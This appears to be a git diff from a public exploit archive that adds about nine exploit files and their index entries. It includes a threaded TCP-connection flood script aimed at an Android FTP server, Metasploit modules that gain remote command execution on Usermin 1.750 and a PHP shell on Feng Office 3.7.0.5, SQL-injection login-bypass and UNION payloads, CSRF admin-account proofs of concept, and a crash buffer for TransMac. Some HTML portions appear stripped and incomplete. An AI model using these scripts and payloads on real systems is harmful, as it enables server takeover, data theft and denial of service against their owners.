diff --git a/exploits/android/dos/46464.py b/exploits/android/dos/46464.py new file mode 100755 index 000000000..c8eabb0f3 --- /dev/null +++ b/exploits/android/dos/46464.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python +#coding: utf-8 + +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * FTP Server 1.32 Remote Denial of Service (DoS) * +# ************************************************************************ + +# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS) +# Date: 2019-02-26 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor: The Olive Tree +# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver +# Category: Mobile Apps +# Version: <= FTP Server 1.32 +# Tested on: Android + +import socket, random, string, signal, ssl, argparse, sys +from time import sleep +from threading import Thread, active_count +from os import system, geteuid + +if geteuid() != 0: + print("\nPlease, run %s as root...\n" % sys.argv[0]) + sys.exit() + +stop = False + +def signal_handler(signal, frame): + global stop + stop = True + +def spam(target_ip, port): + while True: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + try: + s.connect((target_ip, port)) + except: + pass + if stop == True: + break + +if __name__ == '__main__': + + signal.signal(signal.SIGINT, signal_handler) + + if len(sys.argv) != 3: + print "\nUsage: python " + sys.argv[0] + " \n" + sys.exit(1) + + target = sys.argv[1] + port = int(sys.argv[2]) + + target_ip = socket.gethostbyname(target) + + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + + threads = [] + + payload = '' + + for i in xrange(0,50): + t = Thread(target=spam, args=(target_ip, port,)) + threads.append(t) + t.start() + + while True: + + if active_count() == 1 or stop == True: + + system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + print("") + break \ No newline at end of file diff --git a/exploits/linux/dos/46465.txt b/exploits/linux/dos/46465.txt new file mode 100644 index 000000000..06f3c2a1d --- /dev/null +++ b/exploits/linux/dos/46465.txt @@ -0,0 +1,31 @@ +#Exploit Title: Buffer overflow +# Date: 27-02-2019 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://webkit.org/ +# Software Link: https://gitlab.gnome.org/GNOME/epiphany +# Version: 2.23.90 +# Tested on: Linux 4.15.0-38-generic +# CVE: CVE-2019-8375 +# References: +# https://nvd.nist.gov/vuln/detail/CVE-2019-8375 +# https://www.inputzero.io/2019/02/fuzzing-webkit.html + +## Summary: +The UIProcess subsystem in WebKit, as used in WebKitGTK through 2.23.90 and +WebKitGTK+ through 2.22.6 and other products, does not prevent the script +dialog size from exceeding the web view size, which allows remote attackers +to cause a denial of service (Buffer Overflow) or possibly have unspecified +other impact, related to UIProcess/API/gtk/WebKitScriptDialogGtk.cpp, +UIProcess/API/gtk/WebKitScriptDialogImpl.cpp, and +UIProcess/API/gtk/WebKitWebViewGtk.cpp, as demonstrated by GNOME Web (aka +Epiphany). + +## PoC: + \ No newline at end of file diff --git a/exploits/linux/webapps/46468.rb b/exploits/linux/webapps/46468.rb new file mode 100755 index 000000000..dab4ae6ad --- /dev/null +++ b/exploits/linux/webapps/46468.rb @@ -0,0 +1,287 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Usermin 1.750 - Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in Usermin + 1.750 and lower versions. This vulnerability has the same characteristics as the Webmin 1.900 RCE(EDB-46201). + Any user authorized to the "Java file manager" and "Upload and Download" fields, to execute arbitrary commands with root privileges. + Usermin is the most shared interface with users, so the vulnerability is dangerous. + In addition, "Running Processes" field must be authorized to discover the directory to be uploaded. + A vulnerable ".cgi" file can be printed on the original files of the Usermin application. + The vulberable file we are uploading should be integrated with the application. + Therefore, a ".cgi" file with the vulnerability belong to Usermin application should be used. + The module has been tested successfully with Usermin 1.750 over Debian 4.9.18. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Usermin-1750-Remote-Command-Execution.html'] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby python telnet', + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Usermin <= 1.750', { }]], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(20000), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Usermin Username']), + OptString.new('PASSWORD', [true, 'Usermin Password']) + ], self.class) + end + +## +# Target and input verification +## + + def check + + peer = "#{rhost}:#{rport}" + + vprint_status("Attempting to login...") + + data = "user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" + + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/session_login.cgi", + 'cookie' => "redirect=1; testing=1", + 'data' => data + }, 25) + + if res and res.code == 302 and res.get_cookies =~ /usid/ + vprint_good "Login successful" + session = res.get_cookies.split("usid=")[1].split(";")[0] + print_status("#{session}") + else + vprint_error "Service found, but login failed" + return Exploit::CheckCode::Detected + end + + vprint_status("Attempting to execute...") + + command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" + + res = send_request_cgi( + { + 'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|", + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }, 25) + + + if res and res.code == 200 and res.message =~ /Document follows/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + + end + +## +# Exploiting phase +## + + def exploit + + peer = "#{rhost}:#{rport}" + + print_status("Attempting to login...") + + data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" + + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/session_login.cgi", + 'cookie' => "redirect=1; testing=1", + 'data' => data + }, 25) + + if res and res.code == 302 and res.get_cookies =~ /usid/ + session = res.get_cookies.scan(/usid\=(\w+)\;*/).flatten[0] || '' + if session and not session.empty? + print_good "Login successfully" + else + print_error "Authentication failed" + return + end + else + print_error "Authentication failed" + return + end + +## +# Directory and SSL verification for referer +## + ps = "#{datastore['SSL']}" + if ps == "true" + ssl = "https://" + else + ssl = "http://" + end + + print_status("Target URL => #{ssl}#{peer}") + + res1 = send_request_raw( + { + 'method' => "POST", + 'uri' => "/proc/index_tree.cgi?", + 'headers' => + { + 'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1", + }, + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }) + + if res1 and res1.code == 200 and res1.body =~ /Running Processes/ + print_status "Searching for directory to upload..." + stpdir = res1.body.scan(/perl.+usermin/).map{ |s| s.split("perl ").last }.map{ |d| d.split("miniserv").first }.map{ |d| d.split("miniserv").first } + dir = stpdir[0] + "file" + print_good("Directory to upload => #{dir}") + else + print_error "No access to processes or no upload directory found." + return + end + + +## +# Loading phase of the vulnerable file +## + + boundary = Rex::Text.rand_text_alphanumeric(29) + + data2 = "-----------------------------{boundary}\r\n" + data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n" + data2 << "Content-Type: application/octet-stream\r\n\r\n" + data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n" + data2 << "$trust_unknown_referers = 1;\nrequire './file-lib.pl';\n&ReadParse();\nuse POSIX;\n" + data2 << "$p = $ENV{'PATH_INFO'};\nif ($in{'type'}) {\n\t# Use the supplied content type\n\t" + data2 << "$type = $in{'type'};\n\t$download = 1;\n\t}\nelsif ($in{'format'} == 1) {\n\t" + data2 << "# Type comes from compression format\n\t$type = \"application/zip\";\n\t}\n" + data2 << "elsif ($in{'format'} == 2) {\n\t$type = \"application/x-gzip\";\n\t}\n" + data2 << "elsif ($in{'format'} == 3) {\n\t$type = \"application/x-tar\";\n\t}\nelse {\n\t" + data2 << "# Try to guess type from filename\n\t$type = &guess_mime_type($p, undef);\n\t" + data2 << "if (!$type) {\n\t\t# No idea .. use the 'file' command\n\t\t" + data2 << "$out = &backquote_command(\"file \".\n\t\t\t\t\t quotemeta(&resolve_links($p)), 1);\n\t\t" + data2 << "if ($out =~ /text|script/) {\n\t\t\t$type = \"text/plain\";\n\t\t\t}\n\t\telse {\n\t\t\t" + data2 << "$type = \"application/unknown\";\n\t\t\t}\n\t\t}\n\t}\n\n# Dump the file\n&switch_acl_uid();\n" + data2 << "$temp = &transname();\nif (!&can_access($p)) {\n\t# ACL rules prevent access to file\n\t" + data2 << "&error_exit(&text('view_eaccess', &html_escape($p)));\n\t}\n$p = &unmake_chroot($p);\n\n" + data2 << "if ($in{'format'}) {\n\t# An archive of a directory was requested .. create it\n\t" + data2 << "$archive || &error_exit($text{'view_earchive'});\n\tif ($in{'format'} == 1) {\n\t\t" + data2 << "$p =~ s/\\.zip$//;\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t$p =~ s/\\.tgz$//;\n\t\t}\n\t" + data2 << "elsif ($in{'format'} == 3) {\n\t\t$p =~ s/\\.tar$//;\n\t\t}\n\t-d $p || &error_exit($text{'view_edir'}.\" \".&html_escape($p));\n\t" + data2 << "if ($archive == 2 && $archmax > 0) {\n\t\t# Check if directory is too large to archive\n\t\tlocal $kb = &disk_usage_kb($p);\n\t\t" + data2 << "if ($kb*1024 > $archmax) {\n\t\t\t&error_exit(&text('view_earchmax', $archmax));\n\t\t\t}\n\t\t}\n\n\t" + data2 << "# Work out the base directory and filename\n\tif ($p =~ /^(.*\\/)([^\\/]+)$/) {\n\t\t$pdir = $1;\n\t\t" + data2 << "$pfile = $2;\n\t\t}\n\telse {\n\t\t$pdir = \"/\";\n\t\t$pfile = $p;\n\t\t}\n\n\t" + data2 << "# Work out the command to run\n\tif ($in{'format'} == 1) {\n\t\t" + data2 << "&has_command(\"zip\") || &error_exit(&text('view_ecmd', \"zip\"));\n\t\t" + data2 << "$cmd = \"zip -r $temp \".quotemeta($pfile);\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t" + data2 << "&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t" + data2 << "&has_command(\"gzip\") || &error_exit(&text('view_ecmd', \"gzip\"));\n\t\t" + data2 << "$cmd = \"tar cf - \".quotemeta($pfile).\" | gzip -c >$temp\";\n\t\t}\n\t" + data2 << "elsif ($in{'format'} == 3) {\n\t\t&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t" + data2 << "$cmd = \"tar cf $temp \".quotemeta($pfile);\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t" + data2 << "# Don't actually do anything if in test mode\n\t\t&ok_exit();\n\t\t}\n\n\t" + data2 << "# Run the command, and send back the resulting file\n\tlocal $qpdir = quotemeta($pdir);\n\t" + data2 << "local $out = `cd $qpdir ; ($cmd) 2>&1 "POST", + 'uri' => "/updown/upload.cgi?id=154739243511", + 'data' => data2, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}', + 'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1", + }, + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }) + + if res2 and res2.code == 200 and res2.body =~ /Saving file/ + print_good "Vulnerable show.cgi file was successfully uploaded." + else + print_error "Upload failed." + return + end +## +# Command execution and shell retrieval +## + print_status("Attempting to execute the payload...") + + command = payload.encoded + + res = send_request_cgi( + { + 'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|", + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }, 25) + + + if res and res.code == 200 and res.message =~ /Document follows/ + print_good "Payload executed successfully" + else + print_error "Error executing the payload" + return + end + + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/46461.txt b/exploits/php/webapps/46461.txt new file mode 100644 index 000000000..e63d5f0a7 --- /dev/null +++ b/exploits/php/webapps/46461.txt @@ -0,0 +1,20 @@ +# Exploit Title: Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# Authentication Bypass: + +# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- - + Password: ' or 1 -- - + +# SQL Injection: + +# http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi] +# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- \ No newline at end of file diff --git a/exploits/php/webapps/46462.html b/exploits/php/webapps/46462.html new file mode 100644 index 000000000..0dca91889 --- /dev/null +++ b/exploits/php/webapps/46462.html @@ -0,0 +1,27 @@ +# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Add Admin + + +
+ +

+ +

+ +

+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46463.html b/exploits/php/webapps/46463.html new file mode 100644 index 000000000..9072f30ff --- /dev/null +++ b/exploits/php/webapps/46463.html @@ -0,0 +1,21 @@ +# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Delete Admin + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46467.txt b/exploits/php/webapps/46467.txt new file mode 100644 index 000000000..bc071f3ca --- /dev/null +++ b/exploits/php/webapps/46467.txt @@ -0,0 +1,25 @@ +# Exploit Title: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection +# Date: 19/02/2019 +# Author: Andrei Conache +# Twitter: @andrei_conache +# Contact: andrei.conache[at]protonmail.com +# Software Link: https://www.j2store.org +# Version: 3.x-3.3.6 +# Tested on: Linux +# CVE: CVE-2019-9184 + + +1. Description: +J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries +on the website. + + +2. Proof of Concept: + +- Parameter vulnerable: "product_option[j]" array (where j depends on entries) +- Example: [URL]/index.php?option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX +- sqlmap: product_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862%20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20UNION%20SELECT%205348%20FROM%20DUAL%29%20END%29 + + +3. Solution: +Update to 3.3.7 \ No newline at end of file diff --git a/exploits/php/webapps/46471.rb b/exploits/php/webapps/46471.rb new file mode 100755 index 000000000..6738bb6fc --- /dev/null +++ b/exploits/php/webapps/46471.rb @@ -0,0 +1,137 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Feng Office 3.7.0.5 - (Unauthenticated) Remote Command Execution', + 'Description' => %q{ + This module exploits arbitrary file upload vulnerability in Feng Office 3.7.0.5. + Application allows the unauthenticated users to upload arbitrary files. + There is no control of any session. All files are sent under "/tmp" directory. + The ".htaccess" file under the "/tmp" directory prevents files with the "php,php2,php3.." extensions. + This exploit creates the php payload and moves the payload to the main directory via "shtml". + After moving the php payload to the main directory, Exploit executes payload and receives shell. + }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Feng-Office-3-7-0-5-Unauthenticated-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Feng Office <= 3.7.0.5', {}] + ], + 'DisclosureDate' => '28 Feb 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to Feng Office', '/']), + ], self.class) + end + + def exploit +## +# Upload Payload and directory discovery +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"upload\"; filename=\"akkus.php\"\r\n" + data << "Content-Type: binary/octet-stream\r\n\r\n" + data << payload.encoded + data << "\n\r\n-----------------------------{boundary}--\r\n" + + + data << "-----------------------------{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}' + }, + 'uri' => normalize_uri(target_uri, "/ck_upload_handler.php") + }) + + + if not (res and res.body =~ /tmp\/([^\"]+)\',/) + print_error("Something went wrong. PHP File Upload failed.") + return nil + end + upfile = $1 + print_status("PHP Payload: #{upfile}") + + updir = res.body.scan(/.+ck_upload_handler.php/).map{ |s| s.split("in ").last }.map{ |s| s.split("").last }.map{ |s| s.split("ck_upload_handler.php").last } + dirc = updir[0] + print_status("Application Directory Path: #{dirc}") +## +# Upload shtml and run CMD command to move Payload to the main directory +## + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"upload\"; filename=\"akkus.shtml\"\r\n" + data << "Content-Type: text/html\r\n\r\n\r\n\r\n\n\r\n" + data << "-----------------------------{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}' + }, + 'uri' => normalize_uri(target_uri, "/ck_upload_handler.php") + }) + + if not (res and res.body =~ /tmp\/([^\"]+)\',/) + print_error("Something went wrong. sHTML file Upload failed.") + return nil + else + print_good("Uploads successful completed.") + end + upfile2 = $1 + print_status("SHTML Payload: #{upfile2}") + print_good("#{peer} - Retrieving remote command shell...") + +## +# Running shtml for file migration +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/tmp/#{upfile2}"), + }) +## +# Running php for remote shell +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/#{upfile}"), + }) + + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/windows/dos/46470.py b/exploits/windows/dos/46470.py new file mode 100755 index 000000000..2b4b45807 --- /dev/null +++ b/exploits/windows/dos/46470.py @@ -0,0 +1,24 @@ +# -*- coding: utf-8 -*- +# Exploit Title: TransMac 12.3 - 'Volume name' Denial of Service (PoC) +# Date: 27/02/2019 +# Author: Alejandra Sánchez +# Vendor Homepage: https://www.acutesystems.com/ +# Software Link: https://www.acutesystems.com/tmac/tmsetup.exe +# Version: 12.3 +# Tested on: Windows 10 + + +# Proof of Concept: +# 1.- Run the python script "TransMac.py", it will create a new file "TransMac.txt" +# 2.- Copy the content of the new file 'TransMac.txt' to clipboard +# 3.- Open TransMac.exe +# 4.- Go to File > New Disk Image +# 5.- Paste clipboard in 'Volume name' field +# 6.- Click on button -> Ok +# 7.- Save the new disk with any name, e.g 'exploit.dmg' +# 8.- Crashed + +buffer = "\x41" * 1000 +f = open ("TransMac.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 04a0230db..87daaf194 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6336,6 +6336,9 @@ id,file,description,date,author,type,platform,port 46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android, 46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple, 46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows, +46464,exploits/android/dos/46464.py,"FTP Server 1.32 - Denial of Service",2019-02-28,s4vitar,dos,android, +46465,exploits/linux/dos/46465.txt,"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service",2019-02-28,"Dhiraj Mishra",dos,linux, +46470,exploits/windows/dos/46470.py,"TransMac 12.3 - Denial of Service (PoC)",2019-02-28,"Alejandra Sánchez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -40913,3 +40916,9 @@ id,file,description,date,author,type,platform,port 46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php, 46457,exploits/php/webapps/46457.txt,"Advance Gift Shop Pro Script 2.0.3 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php, 46459,exploits/php/webapps/46459.py,"Drupal < 8.6.9 - REST Module Remote Code Execution",2019-02-25,leonjza,webapps,php, +46461,exploits/php/webapps/46461.txt,"Simple Online Hotel Reservation System - SQL Injection",2019-02-28,"Mr Winst0n",webapps,php, +46462,exploits/php/webapps/46462.html,"Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)",2019-02-28,"Mr Winst0n",webapps,php, +46463,exploits/php/webapps/46463.html,"Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)",2019-02-28,"Mr Winst0n",webapps,php, +46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php, +46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux, +46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,